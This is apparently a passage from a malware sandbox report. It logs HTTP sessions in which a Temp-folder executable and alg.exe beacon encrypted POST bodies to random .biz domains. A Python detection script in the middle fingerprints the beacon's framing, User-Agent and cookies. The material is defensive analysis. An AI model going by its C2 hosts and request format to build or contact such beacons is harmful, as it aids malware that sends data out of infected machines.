Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.5 | 50056 | 54.244.188.177 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:54.132848978 CEST | 355 | OUT | POST /kquvnwuqqcd HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: dwrqljrr.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Oct 10, 2024 10:08:54.132863045 CEST | 828 | OUT | Data Raw: 9a 71 83 79 40 65 3f c5 30 03 00 00 da f3 e6 df c9 29 b4 7b 36 d9 78 cd 94 ed 18 31 f8 00 4f d6 15 22 8d cc da dc a2 d2 ec a6 71 13 77 a1 67 cb d9 ec 0b 06 35 00 02 f4 5a fa 47 37 bd dc 0d d4 96 f5 99 47 b2 f3 3a f7 91 04 93 63 55 06 75 d5 49 4e
    Data Ascii: qy@e?0){6x1O"qwg5ZG7G:cUuINoc1<@ideL~|">MUf"%nH/%OT 38fzSfT.dV}fUo@XE5fB4p3yRD}>(UMqQb
Oct 10, 2024 10:08:54.853517056 CEST | 410 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 10 Oct 2024 08:08:54 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=d711bb618d548e5256311ee59166405b|8.46.123.33|1728547734|1728547734|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.5 | 50057 | 35.164.78.200 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:54.889446020 CEST | 347 | OUT | POST /ggwhl HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: nqwjmb.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Oct 10, 2024 10:08:54.889446020 CEST | 828 | OUT | Data Raw: 34 0a 35 e1 c5 12 31 f0 30 03 00 00 a5 99 b8 d6 f2 d6 3d 2e fa 6a 05 af 07 2c f8 af 69 2d 1f 9a ab b6 74 74 54 b3 4e cd 35 af 34 a5 2c 54 c4 f9 fb 75 3e e4 e9 d0 f1 70 e7 46 af 43 a5 86 8c 52 45 0c a4 2a ca cd 31 78 91 84 eb 0b 12 02 d1 d3 d4 3c
    Data Ascii: 4510=.j,i-ttTN54,Tu>pFCRE*1x<l|6y.hdU!TUEop4o9KEkc{~56a_&<H]S`?QTn{CpVa47/!P`5bqjY.3l**(4)/nii%:X
Oct 10, 2024 10:08:55.617454052 CEST | 408 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 10 Oct 2024 08:08:55 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=5351ceca1fbd0b5fafa91f24c184dd3e|8.46.123.33|1728547735|1728547735|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


Session ID: 77
Source IP: 192.168.2.5    Source Port: 50058
Destination IP: 34.246.200.160    Destination Port: 80
PID: 7120    Process: C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:55.479811907 CEST | 357 | OUT | POST /qcnhkliwpylu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mgmsclkyu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:55.479823112 CEST | 778 | OUT | Data Raw: 49 de 23 f4 97 9e 27 5c fe 02 00 00 4a 81 1e 7e fe d3 76 2f e2 4a 6a 04 1b 0f 70 70 0f da 54 a3 66 77 4d 99 37 51 de 2b 03 a5 98 0d e9 a9 66 e5 b1 cf 44 8f df ed c6 63 cc af 0d 32 4b 50 af ed 6c b4 de 83 cb aa a0 bc be ea d5 05 26 14 0a e0 30 df
Data Ascii: I#'\J~v/JjppTfwM7Q+fDc2KPl&0rN#<mGm;6@h^Gf*h^FThs6h5xR%Gzq`7HW+qJ8D(UF'!,'PXDU>rAZ^4"\&T+"
Oct 10, 2024 10:08:56.247562885 CEST | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=826bb51793629c90306ceaa23431138b|8.46.123.33|1728547736|1728547736|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 78
Source IP: 192.168.2.5    Source Port: 50059
Destination IP: 3.94.10.34    Destination Port: 80
PID: 576    Process: C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:55.651859045 CEST | 348 | OUT | POST /gvv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ytctnunms.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:08:55.651859045 CEST | 828 | OUT | Data Raw: 82 5f cb 6c 0f 04 3c 3f 30 03 00 00 11 a4 62 4f 11 78 66 28 6a 2c dc 58 7e b9 20 bb 8d 3f 34 5c 42 70 c4 da b5 3a d0 48 be 95 19 04 f4 b1 93 8e df 0b b5 e3 ec af 07 f6 26 56 e4 23 de c9 a1 24 18 72 ff 53 8c 27 52 71 cb 7c 17 0c 17 0a c9 ad 11 47
Data Ascii: _l<?0bOxf(j,X~ ?4\Bp:H&V#$rS'Rq|GQ"T1 G;>![=+SA=I~~Qh1Ky!{rhU|2wt(=pr|G_mA]#b>U;VEN[eVDG!<T^Ye5
Oct 10, 2024 10:08:56.126544952 CEST | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e4a80bed28fac827ecddcdc5bd7012c6|8.46.123.33|1728547736|1728547736|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 79
Source IP: 192.168.2.5    Source Port: 50060
Destination IP: 165.160.13.20    Destination Port: 80
PID: 576    Process: C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:56.156876087 CEST | 351 | OUT | POST /vhprbmdefc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: myups.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:08:56.156898022 CEST | 828 | OUT | Data Raw: 82 4e d6 e8 62 cf 26 b8 30 03 00 00 d9 f0 d3 ea 2a 64 9a e8 dd 79 f8 18 5d df ab be 3b c6 24 2a 75 41 ea cb d5 ca ec 32 c6 af 9a d3 53 69 c4 e2 0f 40 11 50 62 c1 af e1 e4 67 00 a3 83 47 3d 43 73 60 a9 ea 8a a7 c9 cc c6 04 89 ab fd e0 3b 4b 44 b1
Data Ascii: Nb&0*dy];$*uA2Si@PbgG=Cs`;KDddovgLss&n_lgq==DB_lcjc;^{|BK'<]A] `ac)'QF/-|=4V!fBJpIcKXk_wcEgj
Oct 10, 2024 10:08:56.767970085 CEST | 170 | IN | HTTP/1.1 200 OK
Date: Thu, 10 Oct 2024 08:08:56 GMT
Content-Length: 94
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
Oct 10, 2024 10:08:56.770220995 CEST | 355 | OUT | POST /wqmolrbsijpjbu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: myups.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:08:56.770277977 CEST | 828 | OUT | Data Raw: bd 21 cf a6 29 7c 1d dc 30 03 00 00 24 0c 2b 0d 6e 79 73 08 a5 23 51 2e 95 8c e8 cd 40 09 c8 73 df b6 0d 46 07 fe f2 d2 67 4b 53 af 13 8d db d9 bf 76 77 28 c6 a1 eb 7c 08 e5 ee f9 51 58 ba ea 99 55 d9 d8 b2 ab c3 16 9d 89 77 2c 5f 25 90 56 ff 39
Data Ascii: !)|0$+nys#Q.@sFgKSvw(|QXUw,_%V9_WbH2l?e(BdZf&M?2HJ\EQKU.1.w4P#/:pD.}$rGO#)7s#I[n]r.yyFDnS{H~H
Oct 10, 2024 10:08:56.956769943 CEST | 170 | IN | HTTP/1.1 200 OK
Date: Thu, 10 Oct 2024 08:08:56 GMT
Content-Length: 94
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
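Two regularities in the sessions above are worth checking by hand rather than by eye. First, every outbound POST body starts with 8 bytes that differ per request followed by a 4-byte little-endian integer that equals Content-Length minus 12 (0x330 = 816 for the 828-byte bodies, 0x2fe = 766 for the 778-byte one), which is what a triager would use to tell the framing from the opaque payload when writing a signature. Second, the `btst` cookie returned by nqwjmb.biz, mgmsclkyu.biz and ytctnunms.biz embeds the sandbox's egress IP and an epoch value that matches the reply's Date header, while myups.biz answers with a 94-byte HTML document instead of an empty chunked body. The script below is an added example written for this report, not code from Joe Sandbox or from the analysed sample; the reading of bytes 8..11 as a payload length is an inference from the five bodies shown, the regex thresholds and the hit count are the author's own choices, and the contrasting benign request is made up.

```python
"""Added example (not from the Joe Sandbox report or the analysed sample):
checks a security engineer can run over the HTTP sessions shown above."""
import re
import struct
from datetime import datetime, timezone

# Constructed from the report: Content-Length and the first 12 bytes of each
# outbound POST body (the first host is taken from its reply's Set-Cookie domain).
SAMPLE_POSTS = [
    ("nqwjmb.biz",    828, bytes.fromhex("340a35e1c51231f030030000")),
    ("mgmsclkyu.biz", 778, bytes.fromhex("49de23f4979e275cfe020000")),
    ("ytctnunms.biz", 828, bytes.fromhex("825fcb6c0f043c3f30030000")),
    ("myups.biz",     828, bytes.fromhex("824ed6e862cf26b830030000")),
    ("myups.biz",     828, bytes.fromhex("bd21cfa6297c1ddc30030000")),
]

# Session 78's request headers, reconstructed from the report.
SAMPLE_REQUEST = (
    "POST /gvv HTTP/1.1\r\n"
    "Cache-Control: no-cache\r\n"
    "Connection: Keep-Alive\r\n"
    "Pragma: no-cache\r\n"
    "Host: ytctnunms.biz\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 "
    "MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat "
    "QBCore/3.43.884.400 QQBrowser/9.0.2524.400\r\n"
    "Content-Length: 828\r\n\r\n"
)
# A made-up ordinary browser request, for contrast (not from the report).
BENIGN_REQUEST = (
    "POST /api/login HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/130.0\r\n"
    "Content-Type: application/json\r\n"
    "Content-Length: 42\r\n\r\n"
)
# First Set-Cookie of the nqwjmb.biz reply, as shown in the report.
SAMPLE_SET_COOKIE = ("btst=5351ceca1fbd0b5fafa91f24c184dd3e|8.46.123.33|1728547735"
                     "|1728547735|0|1|0; path=/; domain=.nqwjmb.biz; HttpOnly")

# The User-Agent every request in the report carries, byte for byte.
BEACON_UA = SAMPLE_REQUEST.split("User-Agent: ", 1)[1].split("\r\n", 1)[0]


def parse_body_header(body: bytes) -> tuple[bytes, int]:
    """Split the 12-byte prefix seen on every POST body: 8 opaque bytes, then
    a little-endian uint32. Assumption drawn from the five samples: the uint32
    is the length of the data that follows the prefix."""
    if len(body) < 12:
        raise ValueError("body shorter than the 12-byte prefix")
    (declared,) = struct.unpack_from("<I", body, 8)
    return body[:8], declared


def length_field_matches(content_length: int, body_prefix: bytes) -> bool:
    """True when the embedded length equals Content-Length minus the prefix."""
    _, declared = parse_body_header(body_prefix)
    return declared == content_length - 12


def classify_request(raw: str) -> dict:
    """Score a raw HTTP request against the beacon shape visible in the report:
    short lowercase path, lowercase .biz host, the fixed WeChat/QQBrowser UA,
    the Cache-Control/Pragma no-cache pair, and a body with no Content-Type."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, path, _ = head[0].split(" ", 2)
    headers = {k.lower(): v for k, v in (h.split(": ", 1) for h in head[1:])}
    hits = []
    if method == "POST" and re.fullmatch(r"/[a-z]{3,16}", path):
        hits.append("random-lowercase-path")
    if re.fullmatch(r"[a-z]{4,16}\.biz", headers.get("host", "")):
        hits.append("random-lowercase-biz-host")
    if headers.get("user-agent") == BEACON_UA:
        hits.append("fixed-wechat-qqbrowser-ua")
    if headers.get("cache-control") == "no-cache" and headers.get("pragma") == "no-cache":
        hits.append("no-cache-pair")
    if "content-type" not in headers and int(headers.get("content-length", "0")) > 0:
        hits.append("body-without-content-type")
    return {"host": headers.get("host", ""), "path": path, "hits": hits,
            "suspicious": len(hits) >= 4}   # threshold is the author's choice


def cookie_epoch_matches_date(set_cookie: str, date_header: str) -> bool:
    """The btst cookie value is '<hex>|<client ip>|<epoch>|<epoch>|0|1|0';
    check that its first epoch equals the reply's Date header."""
    value = set_cookie.split(";", 1)[0].split("=", 1)[1]
    epoch = int(value.split("|")[2])
    when = datetime.strptime(date_header, "%a, %d %b %Y %H:%M:%S GMT")
    return int(when.replace(tzinfo=timezone.utc).timestamp()) == epoch


if __name__ == "__main__":
    for host, clen, prefix in SAMPLE_POSTS:
        print(host, clen, length_field_matches(clen, prefix))
    print(classify_request(SAMPLE_REQUEST))
    print(cookie_epoch_matches_date(SAMPLE_SET_COOKIE, "Thu, 10 Oct 2024 08:08:55 GMT"))
```

The length check is the part worth carrying into a network signature: a rule keyed on the User-Agent alone will match any real WeChat-embedded browser, whereas "POST with no Content-Type whose body bytes 8..11 equal Content-Length minus 12" is specific to this framing. The cookie check is mainly useful for telling the three hosts that return an empty chunked body apart from myups.biz, which sets no cookie and returns HTML; the report does not say what either server is, so the script records the difference without naming it.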


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.5 | 50061 | 18.141.10.107 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:56.592171907 CEST | 348 | OUT | POST /rxkip HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: warkcdu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:56.592197895 CEST | 778 | OUT | Data Raw: 6e 4d 49 fb a6 55 64 50 fe 02 00 00 ca f7 97 e9 a6 83 06 9b 01 b2 e2 be ef 9a 45 2c f3 2e af 62 1d 0b 4f fe 01 24 93 f4 9a 24 83 4f d6 c0 50 af 46 19 09 c3 b5 39 59 23 a7 bc 9f cf 72 c2 88 85 b0 4c a7 25 f5 ae da e3 b0 80 3d c5 ed c5 32 b4 18 c4
Data Ascii: nMIUdPE,.bO$$OPF9Y#rL%=2a#0&Sh1<T@Bc5qxj53t?a0T'(ud""ihZRQop1+(C+mD?KSK+C:t$W*"^


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.5 | 50062 | 18.141.10.107 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:56.919321060 CEST | 353 | OUT | POST /rgwkboikrm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: warkcdu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:56.919321060 CEST | 778 | OUT | Data Raw: e9 1a 1f f8 a2 30 59 19 fe 02 00 00 31 be 32 87 04 05 46 8f c7 02 0f 3e 04 b8 1b c0 bb d7 5d 41 3f 72 87 42 58 14 c8 c1 ea 88 1f df e4 26 ce 6b 8c 2c 89 56 fc 82 1f 25 70 91 94 c9 06 a5 c9 e6 a2 a7 be 61 dd 37 31 8b b6 e1 93 fb 92 7f 0d 65 8a 28
Data Ascii: 0Y12F>]A?rBX&k,V%pa71e(O-*Bv!/$Gv]t2U;'pw(&BH<@#cOEHH<Fzo<1wvFs~~#3j~el9M}
Oct 10, 2024 10:08:58.266864061 CEST | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=66133e358dcbdbcb083b08d5b586902c|8.46.123.33|1728547737|1728547737|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.5 | 50063 | 54.244.188.177 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:56.977911949 CEST | 347 | OUT | POST /xp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: oshhkdluh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:08:56.977926970 CEST | 828 | OUT | Data Raw: 41 70 c2 dc 4e e4 d1 b0 30 03 00 00 8d ee 7e c1 aa 11 25 4a 7a f5 3c 74 ad fb 5d 46 a2 c7 86 2e 18 7e 5b c1 87 a9 fb fd f8 a9 26 7b 45 fa 66 b2 c6 61 01 61 a9 01 51 cc c1 e9 60 72 a9 95 4a 24 f8 a8 28 bf b3 fc 78 bc 0e b8 db eb ca 16 a7 1b b6 92
Data Ascii: ApN0~%Jz<t]F.~[&{EfaaQ`rJ$(xb9UfQJM/dlPa$ L(V,]QCM~Q91Z]$-`6:0w>;3u2s>"wu$Zi6su7beTt?E3k2Z|_R(
Oct 10, 2024 10:08:57.711050034 CEST | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a8ec139ad8335b71b6464c9fd94658e0|8.46.123.33|1728547737|1728547737|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
83 | 192.168.2.5 | 50064 | 208.100.26.245 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:57.732062101 CEST | 345 | OUT | POST /cx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:08:57.732062101 CEST | 828 | OUT | Data Raw: d1 9e af 81 ac 36 aa 87 30 03 00 00 6a 4e 09 ef 0a 2d 7d bb 3b f1 5a f4 33 1d 7f 7f 0d 94 0f 91 8f 99 19 d8 24 2e 76 46 bc 18 b6 8d 40 04 63 a7 3e 6f 88 35 0f d3 fc 67 f6 50 11 34 ac 7a e3 20 72 de 4b 68 aa 24 cd 97 a8 32 03 86 55 73 fc cd 11 08
Data Ascii: 60jN-};Z3$.vF@c>o5gP4z rKh$2Us6(U~oI8,0I6Y;RE\3kv+sH?./9_]HytzERSH%q%"S5U9PfUWS[,K&Eu}
Oct 10, 2024 10:08:58.221935987 CEST | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 10 Oct 2024 08:08:58 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 10, 2024 10:08:58.232933044 CEST | 356 | OUT | POST /irsdmqckkulgp HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:08:58.232963085 CEST | 828 | OUT | Data Raw: bc d2 92 37 ca fc 54 70 30 03 00 00 f3 35 b1 43 aa d8 09 4e 02 4b 57 5c 6c db 1e b7 18 da 36 bf 5a 20 d9 54 d6 ae 5d 3c a1 d5 59 65 13 6d 48 88 cd a0 c6 47 12 7a e4 71 ef 11 19 93 77 f6 62 a1 ec 39 13 5f 80 6a ce 99 d1 3e c3 b9 a7 1f ac c3 68 e8
Data Ascii: 7Tp05CNKW\l6Z T]<YemHGzqwb9_j>h]%_Vv )Dvf>BU#SWj/}+\8Ww3Q2/lz|NVQA+U>~k~jaBvOH_iCJ5<S
Oct 10, 2024 10:08:58.363440990 CEST | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 10 Oct 2024 08:08:58 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
